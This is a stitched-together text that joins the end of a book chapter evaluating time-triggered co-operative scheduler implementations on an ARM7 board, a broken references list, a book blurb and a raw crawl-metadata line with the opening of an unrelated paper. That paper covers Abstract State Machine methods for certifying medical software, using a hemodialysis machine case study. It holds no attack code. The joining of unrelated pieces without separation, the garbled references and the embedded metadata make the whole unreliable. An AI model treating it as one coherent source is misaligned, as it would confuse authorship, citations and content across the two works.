instead, “interrupt request wrappers” – which contain Assembly code – are used to manage the sequence of operation in the whole scheduler. The function call tree for the TTC-MTI scheduler is shown in Fig. 21 (compare with Fig. 16). Fig. 21. Function call tree for the TTC-MTI scheduler (in normal conditions) (Nahas, 2011a). Unlike the normal Dispatch schedulers, this implementation relies on two interrupt Update() functions: Tick Update() and Task Update(). The Tick Update() – which is called every tick interval (as normal) – identifies which tasks are ready to execute within the current tick interval. Before placing the processor in the idle mode, the Tick Update() function sets the match register of the task timer according to the release time of the first due task running in the current interval. Calculating the release time of the first task in the system takes into account the WCET of the Tick Update() code. When the task interrupt occurs, the Task Update() sets the return address to the task that will be executed straight after this update function, and sets the match register of the task timer for the next task (if any). The scheduled task then executes as normal. Once the task completes execution, the processor goes back to Sleep() and waits for the next task interrupt (if there are following tasks to execute) or the next tick interrupt which launches a new tick interval. Note that the Task Update() code is written in such a way that it always has a fixed execution duration for avoiding jitter at the starting time of tasks. It is worth highlighting that the TTC-MTI scheduler described here employs a form of “task guardians” which help the system avoid any overruns in the operating tasks. More specifically, the described MTI technique helps the TTC scheduler to shutdown any overrunning task by the time the following interrupt takes place. For example, if the overrunning task is followed by another task in the same tick, then the task interrupt – which triggers the execution of the latter task – will immediately terminate the overrun. Otherwise, the task can overrun until the next tick interrupt takes place which will terminate the overrun immediately. The function call tree for the TTC-MTI scheduler – when a task overrun occurs – is shown in Fig. 22. The only difference between this process and the one shown in Fig. 21 is that an ISR will interrupt the overrunning task (rather than the Sleep() function). Again, if the overrunning task is the last task to execute in a given tick, then it will be interrupted and terminated by the Tick Update() at the next tick interval: otherwise, it will be terminated by the following Task Update(). For further information, see (Nahas, 2011a). ![Fig. 22. Function call tree for the TTC-MTI scheduler (with task overrun) (Nahas, 2008).](image) 8. Evaluation of TTC scheduler implementations This section provides the results of the various TTC implementations considered in the previous section. The results include jitter levels, error handling capabilities and resource (i.e. CPU and memory) requirements. The section begins by briefing the experimental methodology used in this study. 8.1 Experimental methodology The empirical studies were conducted using Ashling LPC2000 evaluation board supporting Philips LPC2106 processor (Ashling Microsystems, 2007). The LPC2106 is a modern 32-bit microcontroller with an ARM7 core which can run – under control of an on-chip PLL – at frequencies from 12 MHz to 60 MHz. The compiler used was the GCC ARM 4.1.1 operating in Windows by means of Cygwin (a Linux emulator for windows). The IDE and simulator used was the Keil ARM development kit (v3.12). For meaningful comparison of jitter results, the task-set shown in Fig. 23 was used to allow exploring the impact of schedule-induced jitter by scheduling Task A to run every two ticks. Moreover, all tasks were set to have variable execution durations to allow exploring the impact of task-induced jitter. For jitter measurements, two measures were recorded: Tick Jitter: represented by the variations in the interval between the release times of the periodic tick, and Task Jitter: represented by the variations in the interval between the release times of periodic tasks. Jitter was measured using a National Instruments data acquisition card ‘NI PCI-6035E’ (National Instruments, 2006), used in conjunction with appropriate software LabVIEW 7.1 (LabVIEW, 2007). The “difference jitter” was reported which is obtained by subtracting the minimum period (between each successive ticks or tasks) from the maximum period obtained from the measurements in the sample set. This jitter is sometimes referred to as “absolute jitter” (Buttazzo, 2005). The CPU overhead was measured using the performance analyzer supported by the Keil simulator which calculates the time required by the scheduler as compared to the total runtime of the program. The percentage of the measured CPU time was then reported to indicate the scheduler overhead in each TTC implementation. For ROM and RAM memory overheads, the CODE and DATA memory values required to implement each scheduler were recorded, respectively. Memory values were obtained using the “.map” file which is created when the source code is compiled. The STACK usage was also measured (as DATA memory overhead) by initially filling the data memory with ‘DEAD CODE’ and then reporting the number of memory bytes that had been overwritten after running the scheduler for sufficient period. 8.2 Results This section summarizes the results obtained in this study. Table 1 presents the jitter levels, CPU requirements, memory requirements and ability to deal with task overrun for all schedulers. The jitter results include the tick and tasks jitter. The ability to deal with task overrun is divided into six different cases as shown in Table 2. In the table, it is assumed that Task A is the overrunning task. <table> <thead> <tr> <th>Scheduler</th> <th>Tick Jitter (µs)</th> <th>Task A Jitter (µs)</th> <th>Task B Jitter (µs)</th> <th>Task C Jitter (µs)</th> <th>CPU %</th> <th>ROM (Bytes)</th> <th>RAM (Bytes)</th> <th>Ability to deal with task overrun</th> </tr> </thead> <tbody> <tr> <td>TTC-SL</td> <td>1.2</td> <td>1.5</td> <td>4016.2</td> <td>5772.2</td> <td>100</td> <td>2264</td> <td>124</td> <td>1b</td> </tr> <tr> <td>TTC-ISR</td> <td>0.0</td> <td>0.1</td> <td>4016.7</td> <td>5615.8</td> <td>39.5</td> <td>2256</td> <td>127</td> <td>1a</td> </tr> <tr> <td>TTC Dispatch</td> <td>0.0</td> <td>0.1</td> <td>4022.7</td> <td>5699.8</td> <td>39.7</td> <td>4012</td> <td>325</td> <td>1b</td> </tr> <tr> <td>TTC-TG</td> <td>0.0</td> <td>0.1</td> <td>4026.2</td> <td>5751.9</td> <td>39.8</td> <td>4296</td> <td>446</td> <td>2b</td> </tr> <tr> <td>TTC-SD</td> <td>0.0</td> <td>0.1</td> <td>1.5</td> <td>1.5</td> <td>74.0</td> <td>5344</td> <td>310</td> <td>1b</td> </tr> <tr> <td>TTC-MTI</td> <td>0.0</td> <td>0.1</td> <td>0.0</td> <td>0.0</td> <td>39.6</td> <td>3620</td> <td>514</td> <td>3a</td> </tr> </tbody> </table> Table 1. Results obtained in the study detailed in this chapter. From the table, it is difficult to obtain zero jitter in the release time of the tick in the TTC-SL scheduler, although the tick jitter can still be low. Also, the TTC-SL scheduler always requires a full CPU load (~ 100%). This is since the scheduler does not use the low-power “idle” mode when not executing tasks: instead, the scheduler waits in a “while” loop. In the TTC-ISR scheduler, the tick interrupts occur at precisely-defined intervals with no measurable delays or jitter and the release jitter in Task A is equal to zero. Inevitably, the memory values in the TTC-Dispatch scheduler are somewhat larger than those required to implement the TTC-SL and TTC-ISR schedulers. The results from the TTC-TG scheduler are very similar to those obtained from the TTC-Dispatch scheduler except that it requires slightly more data memory. When the TTC-SD scheduler is used, the low-priority tasks are executed at fixed intervals. However, there is still a little jitter in the release times of Tasks B and Task C. This jitter is caused by variation in time taken to leave the software loop – which is used in the SD mechanism to check if the required release time for the concerned task is matched – and begin to execute the task. With the TTC-MTI scheduler, the jitter in the release time of all tasks running in the system is totally removed, causing a significant increase in the overall system predictability. Regarding the ability to deal with task overrun, the TTC-TG scheduler detects and hence terminates the overrunning task at the beginning of the tick following the one in which the task overruns. Moreover, the scheduler allows running a backup task in the same tick in which the overrun is detected and hence continues to run the following tasks. This means that one tick shift is added to the schedule. Also, the TTC-MTI scheduler employs a simple TG mechanism and – once an interrupt occurs – the running task (if any) will be terminated. Note that the implementation employed here did not support backup tasks. <table> <thead> <tr> <th>Schedule</th> <th>Shut down time (after Ticks)</th> <th>Backup task</th> <th>Comment</th> </tr> </thead> <tbody> <tr> <td>1a</td> <td>---</td> <td>Not applicable</td> <td>Overrunning task is not shut down. The number of elapsed ticks - during overrun - is not counted and therefore tasks due to run in these ticks are ignored.</td> </tr> <tr> <td>1b</td> <td>---</td> <td>Not applicable</td> <td>Overrunning task is not shut down. The number of elapsed ticks - during overrun - is counted and therefore tasks due to run in these ticks are executed immediately after overrunning task ends.</td> </tr> <tr> <td>2a</td> <td>1 Tick</td> <td>Not available</td> <td>Overrunning task is detected at the time of the next tick and shut down.</td> </tr> <tr> <td>2b</td> <td>1 Tick</td> <td>Available – BK(A)</td> <td>Overrunning task is detected at the time of the next tick and shut down: a replacement (backup) task is added to the schedule.</td> </tr> <tr> <td>3a</td> <td>WCET(Ax)</td> <td>Not available</td> <td>Overrunning task is shut down immediately after it exceeds its estimated WCET.</td> </tr> <tr> <td>3b</td> <td>WCET(Ax)</td> <td>Available – BK(A)</td> <td>Overrunning task is shut down immediately after it exceeds its estimated WCET. A backup task is added to the schedule.</td> </tr> </tbody> </table> Table 2. Examples of possible schedules obtained with task overrun (Nahas, 2008). 9. Conclusions The particular focus in this chapter was on building embedded systems which have severe resource constraints and require high levels of timing predictability. The chapter provided necessary definitions to help understand the scheduling theory and various techniques used to build a scheduler for the type of systems concerned with in this study. The discussions indicated that for such systems, the “time-triggered co-operative” (TTC) schedulers are a good match. This was mainly due to their simplicity, low resource requirements and high predictability they can offer. The chapter, however, discussed major problems that can affect the performance of TTC schedulers and reviewed some suggested solutions to overcome such problems. Then, the discussions focused on the relationship between scheduling algorithm and scheduler implementations and highlighted the challenges faced when implementing software for a particular scheduler. It was clearly noted that such challenges were mainly caused by the broad range of possible implementation options a scheduler can have in practice, and the impact of such implementations on the overall system behavior. The chapter then reviewed six various TTC scheduler implementations that can be used for resource-constrained embedded systems with highly-predictable system behavior. Useful results from the described schedulers were then provided which included jitter levels, memory requirements and error handling capabilities. The results suggested that a “one size fits all” TTC implementation does not exist in practice, since each implementation has advantages and disadvantages. The selection of a particular implementation will, hence, be decided based on the requirements of the application in which the TTC scheduler is employed, e.g. timing and resource requirements. 10. Acknowledgement The research presented in this chapter was mainly conducted in the Embedded Systems Laboratory (ESL) at University of Leicester, UK, under the supervision of Professor Michael Pont, to whom the authors are thankful. 11. References Ways for Implementing Highly-Predictable Embedded Systems Using Time-Triggered Co-Operative (TTC) Architectures National Instruments (2006) "Low-Cost E Series Multifunction DAQ – 12 or 16-Bit, 200 kS/s, 16 Analog Inputs", available online (Last accessed: November 2010) Pop et al., 2002 Nowadays, embedded systems - the computer systems that are embedded in various kinds of devices and play an important role of specific control functions, have permitted various aspects of industry. Therefore, we can hardly discuss our life and society from now onwards without referring to embedded systems. For wide-ranging embedded systems to continue their growth, a number of high-quality fundamental and applied researches are indispensable. This book contains 19 excellent chapters and addresses a wide spectrum of research topics on embedded systems, including basic researches, theoretical studies, and practical work. Embedded systems can be made only after fusing miscellaneous technologies together. Various technologies condensed in this book will be helpful to researchers and engineers around the world. How to reference In order to correctly reference this scholarly work, feel free to copy and paste the following:
{"Source-Url": "https://api.intechopen.com/chapter/pdf-download/29201", "len_cl100k_base": 15133, "olmocr-version": "0.1.50", "pdf-total-pages": 31, "total-fallback-pages": 0, "total-input-tokens": 71236, "total-output-tokens": 20446, "length": "2e13", "weborganizer": {"__label__adult": 0.0005288124084472656, "__label__art_design": 0.0008687973022460938, "__label__crime_law": 0.0004849433898925781, "__label__education_jobs": 0.001728057861328125, "__label__entertainment": 0.0001583099365234375, "__label__fashion_beauty": 0.0002989768981933594, "__label__finance_business": 0.0005955696105957031, "__label__food_dining": 0.0004684925079345703, "__label__games": 0.0012788772583007812, "__label__hardware": 0.0224609375, "__label__health": 0.0007534027099609375, "__label__history": 0.0005893707275390625, "__label__home_hobbies": 0.0002582073211669922, "__label__industrial": 0.0016117095947265625, "__label__literature": 0.00035858154296875, "__label__politics": 0.0004329681396484375, "__label__religion": 0.0007677078247070312, "__label__science_tech": 0.44677734375, "__label__social_life": 8.422136306762695e-05, "__label__software": 0.00882720947265625, "__label__software_dev": 0.50830078125, "__label__sports_fitness": 0.0003941059112548828, "__label__transportation": 0.0017232894897460938, "__label__travel": 0.0002646446228027344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 81838, 0.0327]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 81838, 0.73951]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 81838, 0.89686]], "google_gemma-3-12b-it_contains_pii": [[0, 624, false], [624, 3070, null], [3070, 6263, null], [6263, 10041, null], [10041, 12753, null], [12753, 14637, null], [14637, 18147, null], [18147, 21546, null], [21546, 25223, null], [25223, 27132, null], [27132, 30706, null], [30706, 34243, null], [34243, 38408, null], [38408, 40105, null], [40105, 41994, null], [41994, 44402, null], [44402, 46898, null], [46898, 49148, null], [49148, 52081, null], [52081, 55097, null], [55097, 57666, null], [57666, 60413, null], [60413, 63591, null], [63591, 67061, null], [67061, 69961, null], [69961, 73224, null], [73224, 76196, null], [76196, 79239, null], [79239, 80445, null], [80445, 81838, null], [81838, 81838, null]], "google_gemma-3-12b-it_is_public_document": [[0, 624, true], [624, 3070, null], [3070, 6263, null], [6263, 10041, null], [10041, 12753, null], [12753, 14637, null], [14637, 18147, null], [18147, 21546, null], [21546, 25223, null], [25223, 27132, null], [27132, 30706, null], [30706, 34243, null], [34243, 38408, null], [38408, 40105, null], [40105, 41994, null], [41994, 44402, null], [44402, 46898, null], [46898, 49148, null], [49148, 52081, null], [52081, 55097, null], [55097, 57666, null], [57666, 60413, null], [60413, 63591, null], [63591, 67061, null], [67061, 69961, null], [69961, 73224, null], [73224, 76196, null], [76196, 79239, null], [79239, 80445, null], [80445, 81838, null], [81838, 81838, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 81838, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 81838, null]], "pdf_page_numbers": [[0, 624, 1], [624, 3070, 2], [3070, 6263, 3], [6263, 10041, 4], [10041, 12753, 5], [12753, 14637, 6], [14637, 18147, 7], [18147, 21546, 8], [21546, 25223, 9], [25223, 27132, 10], [27132, 30706, 11], [30706, 34243, 12], [34243, 38408, 13], [38408, 40105, 14], [40105, 41994, 15], [41994, 44402, 16], [44402, 46898, 17], [46898, 49148, 18], [49148, 52081, 19], [52081, 55097, 20], [55097, 57666, 21], [57666, 60413, 22], [60413, 63591, 23], [63591, 67061, 24], [67061, 69961, 25], [69961, 73224, 26], [73224, 76196, 27], [76196, 79239, 28], [79239, 80445, 29], [80445, 81838, 30], [81838, 81838, 31]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 81838, 0.0472]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
b7bd1f3afb7faec009f49b5bcae92dfafde6bee8
Integrating Formal Methods into Medical Software Development: the ASM approach Paolo Arcaini\textsuperscript{a}, Silvia Bonfanti\textsuperscript{b,c}, Angelo Gargantini\textsuperscript{b}, Atif Mashkoor\textsuperscript{c}, Elvinia Riccobene\textsuperscript{d} \textsuperscript{a}Charles University, Faculty of Mathematics and Physics, Czech Republic \textsuperscript{b}Department of Economics and Technology Management, Information Technology and Production, Università degli Studi di Bergamo, Italy \textsuperscript{c}Software Competence Center Hagenberg GmbH, Austria \textsuperscript{d}Dipartimento di Informatica, Università degli Studi di Milano, Italy Abstract Medical devices are safety-critical systems since their malfunctions can seriously compromise human safety. Correct operation of a medical device depends upon the controlling software, whose development should adhere to certification standards. However, these standards provide general descriptions of common software engineering activities without any indication regarding particular methods and techniques to assure safety and reliability. This paper discusses how to integrate the use of a formal approach into the current normative for the medical software development. The rigorous process is based on the Abstract State Machine (ASM) formal method, its refinement principle, and model analysis approaches the method supports. The hemodialysis machine case study is used to show how the ASM-based design process covers most of the engineering activities required by the related standards, and provides rigorous approaches for medical software validation and verification. Keywords: Abstract State Machines, medical device software, certification, modeling, validation, verification, hemodialysis device 1. Introduction Medical devices are increasingly becoming software intensive. This paradigm shift also impacts patients’ safety, as a software malfunctioning can cause injuries or even death to patients \[46\]. Therefore, assuring medical software safety and reliability is mandatory, and methods and techniques for medical software validation and verification are highly demanded. Several standards for the validation of medical devices have been proposed – as ISO 13485 [39], ISO 14971 [40], IEC 60601-1 [37], EU Directive 2007/47/EC [28] –, but they mainly consider hardware aspects of the physical components of a device, and do not mention the software component. The only reference concerning regulation of medical software is the standard IEC (International Electrotechnical Commission) 62304 [38]. This standard provides a very general description of common life cycle activities of the software development, without giving any indication regarding process models, or methods and techniques to assure safety and reliability. The U.S. Food and Drug Administration (FDA), the United States federal executive department that is responsible for protecting and promoting public health through the regulation and supervision of medical devices, although accepts the IEC 62304 standard, also pushes towards the application of rigorous approaches for software validation. In [60], FDA defines several broad concepts that can be used as guidance for software validation and verification, and requires these activities to be conducted throughout the software development life cycle. However, no particular technique or method is recommended. Both IEC standard and FDA principles aim for more rigorous approaches to certify software of medical devices [41, 44]. Potential methods should allow writing well-defined models that can be used to guide the software development, to prove that safety-critical properties hold, and to guarantee conformance of running code to abstract specification of safe device operation (since, most of the time, software for medical devices is not developed from scratch). To be practical, potential methods should provide the tool support for modeling and analysis. The formal approach based on Abstract State Machines (ASMs) [21] proposes an incremental life cycle model for software development based on model refinement, includes the main software engineering activities (specification, validation, verification, conformance checking), and is tool-supported [13]. Despite their rigorous mathematical foundation, ASMs can be viewed as pseudo-code (or virtual machines) working over abstract data structures. Therefore, ASMs are relatively easy to understand even by non-experts. The method has been successfully applied to numerous case studies [21], also in the context of medical software, as in [3, 15] for the rigorous development of an optometric measurement device software, and in [4] for the specification and verification of the Hemodialysis Machine Case Study (HMCS) [48]. Although we believe that the rigor of a formal method can improve the current normative and that ASMs have the required potential, evidence must be given about a smooth possible integration of the method into the standards for medical software development. Additionally, it must be studied how much the ASM process is compliant with the normative: which steps and activities of the standard IEC are covered by using ASMs, and which are not; which FDA principles are ensured, and to what extent. In this paper, we take advantage of the results already presented in [4] for the HMCS to make such a compliance analysis with the aim to understand how far we are from proposing an ASM-based process for medical software certification. The current work improves [4] in several aspects: (a) precise analysis of the advantages and shortcomings of the ASM approach w.r.t. the current normative for medical software development; (b) specification and analysis of the HMCS performed at different levels of refinement to show how validation and verification are continuous activities in the process; (c) model visualization in terms of a graphical notation to provide better evidence of the software operation; (d) encoding of a Java prototype of the software controlling the hemodialysis device, in order to show the applicability of conformance checking techniques, thus showing how we deal with the main software engineering activities of the IEC 62304 standard in a formal way. The paper is organized as follows. Sect. 2 introduces the current normative for medical software development. Sect. 3 briefly presents the ASM-based development process. Sect. 4 discusses compliance of the ASM process w.r.t. the normative: it shows how the steps and principles of the standards IEC and FDA are fulfilled by the ASM-based process. Sect. 5 takes advantage of the HMCS to show the application of the ASM process to a medical device for which a certification could be required; it first presents the specification of the HMCS by means of four levels of model refinement (at each level, all possible results concerning requirements validation and property verification are reported); then, it describes a Java prototype of the software controlling the machine, and a technique for conformance checking. Sect. 6 compares our approach with other formal approaches applied to the formalization of medical software and, in particular, to the HMCS. Sect. 7 concludes the paper. 2. Normative for medical software Currently, the main normative for development and analysis of medical software is the standard IEC 62304 [38] and the “General Principles of Software Validation” [60] established by the FDA. We here briefly recall such regulations and their underlying principles since later we want to analyze which activities can be covered by the use of the ASM-based design process. 2.1. IEC 62304 standard The standard IEC 62304 classifies medical software in three classes on the basis of the potential injuries caused by software malfunctions, and defines the life cycle activities (points 5.1-5.8 of Sect. 5 in [38], also shown in Fig. 1) that have to be performed and appropriately documented when developing medical software. Each activity is split into tasks that are mandatory or not depending on the software class. The standard does not prescribe a specific life cycle model, nor it gives indications on methods and techniques to apply. Users are responsible for mapping the adopted life cycle model to the standard. Step (5.1) essentially consists in defining a life cycle model, planning procedures and deliverables, choosing standards, methods and tools, establishing which activity requires verification and how to achieve traceability among system requirements, software requirements, software tests, and risks control. Step (5.2) consists in defining and documenting functional and non-functional software requirements. It also requires checking for traceability between software requirements and system requirements, including risk control measures in the software requirements, and re-evaluating risk analysis on the established software requirements. Step (5.3) regards the specification of the software architecture from the software requirements. It requires to describe the software structure, identify software elements, specify functional and performance requirements for the software elements, identify software elements related to risk control, and verify the software architecture w.r.t. the software requirements. Step (5.4) regards the refinement of the software requirements. architecture into software units. Steps (5.5 - 5.7) regard software implementation and testing at unit, integration, and system levels. Step (5.8) includes the demonstration, by a device manufacturer, that software has been validated and verified. 2.2. FDA General Principles of Software Validation FDA accepts the standard IEC 62304 for all levels of concerns and pushes for an integration of software life cycle management and risk management activities. The organization promotes the use of formal approaches for software validation and verification (V&V), and establishes the following general principles [60] as guidelines: 1. A documented software requirements specification should provide a baseline for both V&V. 2. Developers should use a mixture of methods and techniques to prevent and to detect software errors. 3. Software V&V should be planned early and conducted throughout the software life cycle. 4. Software V&V should take place within the environment of an established software life cycle. 5. Software V&V process should be defined and controlled through the use of a plan. 6. Software V&V process should be executed through the use of procedures. 7. Software V&V should be re-established upon any (software) change. 8. Validation coverage should be based on the software complexity and safety risks. 9. V&V activities should be conducted using the quality assurance precept of “independence of review.” 10. Device manufacturer has flexibility in choosing how to apply these V&V principles, but retains ultimate responsibility for demonstrating that the software has been validated. 3. ASM-based development process Abstract State Machines (ASMs) are transition systems that extend Finite State Machines by replacing unstructured control states by algebraic structures, i.e., domains of objects with functions and predicates defined on them. A state represents the instantaneous configuration of the system and transition rules describe the state update. There is a limited but powerful set of rule constructors: if-then for guarded actions, par for simultaneous parallel actions, choose for nondeterminism (existential quantification), forall for unrestricted synchronous parallelism (universal quantification). A macro rule is a “named” rule that can be invoked in any point of the model. A run is a (finite or infinite) sequence of states \( s_0, s_1, \ldots, s_n, \ldots \), where each \( s_i \) is obtained by applying the transition rules at \( s_{i-1} \). Functions can be of different types. In particular, controlled functions can be updated by transition rules and represent the internal memory of the ASM; monitored functions, instead, cannot be updated by transition rules, but only by the environment, and represent inputs of the machine. As shown in Fig. 2, the ASM-based development process is carried in an iterative and incremental fashion. The ASMETA (ASM mETAmodeling) framework\(^1\) [13] provides different formal activities supporting the process. Requirements modeling is based on model refinement; it starts by developing a high-level ground model (ASM 0 in Fig. 2) that correctly captures stakeholders requirements, and consistently (i.e., free from specification inconsistencies) reflects the intended system behavior. However, it does not need to be complete, i.e., it may not specify all stakeholder requirements. ASM specifications can be edited by using a concrete syntax [33] in a textual editor; and graphically visualized [5]. Starting from the ground model, through a sequence of refined models, further functional requirements can be specified and a complete architecture of the system is defined. At each refinement step, if a particular kind of refinement (called stuttering refinement) has been applied, refinement correctness can be automatically checked by the refinement prover [11]. Otherwise, a hand-proof must be supplied. The refinement process can stop at any desired level of detail, possibly providing a smooth transition from specification to implementation, which can be seen as the last low-level refinement step. At each level of refinement, different validation and verification (V&V) activities can be performed. Model validation is possible by means of an interactive simulator [33] and a validator [26] which allows to build and execute scenarios of expected system behaviors. Automatic model review (a form of static analysis) is also possible: it allows to check if a model has sufficient quality attributes (i.e., minimality, completeness, and consistency). Property verification of ASMs is possible by means of a model checker [6] that verifies both Computation Tree Logic (CTL) and Linear Temporal Logic (LTL) formulas. Implementation can be either automatically derived from the model [19] or externally provided. In the former case, the conformance w.r.t. the specification should be assured by the translator; in the latter case, conformance checking must be executed. Both Model-Based Testing (MBT) and Runtime Verification can be applied to check whether the implementation conforms to its specification [10]. We support conformance checking w.r.t. Java code. The MBT feature of ASMETA [32] can be used to automatically generate tests from ASM models and, therefore, to check the conformance offline; the support for runtime verification [8], instead, can be used to check the conformance online. 4. ASM-based certification The ASM-based process can be used for developing software of (distributed) medical devices whose (continuous) behaviour can be discretized in a set of states and transitions between them. We are not able to deal with continuous time, although a notion of reactive timed ASMs [56] has been proposed. We here discuss how compliant the ASM-based process is w.r.t. the existing normative in the field of medical software, which activities of the IEC standard can be covered by the use of ASMs, which FDA principles are ensured by the use of ASMs, how the rigor of a formal method such as ASMs can improve the current normative, and what can not be captured by or is out of the scope of ASMs. Aim of such analysis is to understand how far we are from proposing an ASM-based process for medical software certification. 4.1. Compliance of the ASM process with the IEC standard Regarding step (5.1) of the IEC 62304 standard, ASMs can supply a precise iterative and incremental life cycle model based on model refinement. Life cycle procedures are modeling, validation, verification, and conformance checking, the last applicable also at the maintenance phase. Deliverables are given in terms of a sequence of refined models, each one equipped with validation and verification results. Traceability is given, at each refinement step, by the conformance relation between abstract and refined models. ASMs do not support activities peculiar to risk management, although ASM formal verification can be used to check the absence of the risks identified by risk analysis. However, risk management sometimes requires to assess the probability of risk occurrence: ASMs do not have yet a mature support for such probabilistic analysis. Once the ASM-based process is established as development model, the subsequent life cycle activities (steps 5.2-5.7) prescribed by the standard can be devised precisely. When a formal method is used, (software) system requirements (step 5.2) and design (steps 5.3-5.4) are expressed in detail by means of a mathematical model, carefully analyzed and checked before the implementation development. When developing such a formal model, one has to translate the informal requirements, which are expressed in natural language, diagrams, and tables, into a mathematical language which has a formally defined semantics [58]. Informal requirements are the results of the requirements gathering activity (which is also required by step 5.2) which is out of the scope of the ASM method, and thus complementary techniques should be used to this purpose. An example of informal requirements is the HMCS description in [48], that constitutes our input document to cover steps 5.2 to 5.4 for the case study. There is a tight feedback loop between the informal requirements description and the formal specification. Indeed, one of the main benefits of the formal specification is its ability to uncover problems and ambiguities in the informal requirements. Note that the pseudo-code style and freedom of abstraction in ASMs allow for capturing of requirements at a very high-level of abstraction in a form that is understandable by the stakeholders. Furthermore, ASMs are particularly suitable for modeling functional requirements, while non-functional requirements cannot be easily handled. Thanks to the model refinement mechanism, steps (5.2 - 5.4) are covered by the continuous activity of modeling and verifying software requirements along the ASM process till the desired level of refinement, possibly to code level. For the HMCS, this is what is reported in Sects. 5.2, (till a Java prototypical implementation of the case study – see Sect. 5.3). Already at the ground level, software structure is captured, even if not completely, by the model signature (i.e., domains and functions defined on them), while software behavior is specified by means of transition rules. Model refinement and decomposition can help manage the complexity of systems and move from a global view of the system to a component (or unit) view. Design decisions and architectural choices are added along model refinement. For example, for the HMCS, different operation phases are introduced through different levels of refinement, and patient treatments, error handling and property verification are increasingly dealt with at each level. Risk control is performed in terms of verification of required (functional) safety properties, assurance of quality properties, and design of critical scenarios. Steps (5.5 - 5.7) concern code and testing. Although in ASMs a code prototype could be obtained through a translator as last model refinement step, usually we expect code to be developed by a vendor and implemented by the use of powerful programming techniques and languages. Thus, the ASM process does not fully cover these development steps. However, having executable models available, ASM techniques for conformance checking (model-based testing and runtime verification) are applicable. This is shown for the HMCS in Sect. 5.3 by using a prototypical Java implementation. Regarding step (5.8), if a device manufacturer adopts the ASM process, demonstration that software has been validated and verified is straightforward, since validation and verification are continuous activities along the process, and conformance checking is possible on the subsequent released versions of the software. 4.2. ASM process compliant with the FDA principles By proposing the ASM process for medical software development, we respond to the request of using formal approaches for software validation and verification that the FDA organization promotes. Here, we discuss how ASM V&V activities achieve the FDA principles. We still miss a way to integrate software life cycle management and risk management. Using ASMs, requirements are specified and documented by means of a chain of models providing a rigorous baseline for both validation and verification. Continuous defect prevention is supported. At each modeling level, faults and unsafe situations can be checked. Safety properties are proved on models, while software testing for conformance verification of the implementation is possible. The ASM process allows preparation for software validation and verification as early as possible, since V&V can start at ground level. These activities are part of the process, can be planned at different abstract levels, are documented, and supported by precise procedures, i.e., methods and techniques. In case changes only regard the software implementation and do not affect the model, our process requires to re-run conformance checking only; in case a software change requires to review the specification at a certain level, then refinement correctness must be re-proved and V&V re-executed from the concerned level down to the implementation. Regarding validation coverage, by simulation and testing, we can collect the coverage in terms of rules or code covered. This can be used by the designer to estimate if the validation activity is commensurate with the risk associated with the use of the software for the specified intended use. Since V&V are performed by exploiting unambiguous mathematical-based techniques, they facilitate independent evaluation of software quality assurance. The ASM process allows a device manufacturer to demonstrate that the software has been validated and verified: if an implementation is obtained as the last model refinement step, it is correct-by-construction due to the proof of refinement correctness; if the code has been developed by a vendor, conformance checking can guarantee correctness w.r.t. a verified model. 5. Hemodialysis device case study In this section, we exemplify the application of the ASM-based development process by providing a formal specification of the HMCS. In Sect. 5.1 we provide a brief description of the case study. In Sect. 5.2 we show how --- Due to space limitation, we are not able to report the long list of requirements presented in [48]. The reader can access the document also from here: [http://www.cdcc.](http://www.cdcc.) the ASM method can be used to support (in a formal way) the activities required by steps 5.2-5.4 of the IEC 62304 standard, and in Sect. 5.3 to support those required by steps 5.5-5.7. We also show how the FDA principles are concretely fulfilled by the early and continuous V&V activities of the ASM process. 5.1. Case study description Hemodialysis is a medical treatment that uses a device to clean the blood. The hemodialysis device transports the blood from and to the patient, filters wastes and salts from the blood, and regulates the fluid level of the blood. The connection between the patient and the device is surgically created by means of a venous and an arterial access. During the therapy, the device extracts the blood through the arterial access. The dialyser separates the metabolic waste products from the blood. At the end, the clean blood is pumped back to the patient. A therapy session is divided into three phases: preparation, initiation, and ending. The first operation executed in the preparation phase is an automatic test to check all the device functionalities. After that, the concentrate for the therapy is connected and a nurse sets all rinsing parameters. The tubing system is connected to the machine and filled with saline solution. Afterwards, the nurse prepares the heparin pump and inserts the treatment parameters. At the end of the preparation phase, the dialyser is connected to the machine and rinsed with the saline solution. During the initiation phase, the patient is connected to the device through the arterial access and the tubes are filled with blood until the venous red detector (VRD) sensor detects that they are full. Subsequently, the patient is connected venously and the therapy starts. During the therapy, the blood is extracted by the blood pump (BP) and is cleaned by the dialyser using the dialysing fluid (DF). When the therapy is finished, the machine starts the ending phase. The patient is disconnected arterially and the saline solution is infused venously. When the solution is infused completely, the patient is disconnected also venously. After that, the dialyser and the cartridge are emptied. Finally, an overview of the therapy is shown on the device display. faw.jku.at/ABZ2016/HD-CaseStudy.pdf. 5.2. Modeling by refinement In modeling the HMCS, we proceeded through refinement. A peculiarity of the case study [48] is that the device behavior is clearly divided in phases, each characterized by the execution of activities (or sub-phases), as shown in Table 1. At the highest level of abstraction, the ground model gives the overall abstract view of the whole device that goes through three phases: the PREPARATION of the device, the execution (or INITIATION\(^3\)) of the therapy, and the termination (or ENDING) of the process. Then, we proceeded by refining each of these phases. Each refinement step models all the (possible) activities – that lead the device to go through specific sub-phases – performed in the phase and all the controls that are done, with related errors and alarms. The deepest nesting is of four levels, since in phase INITIATION the activity 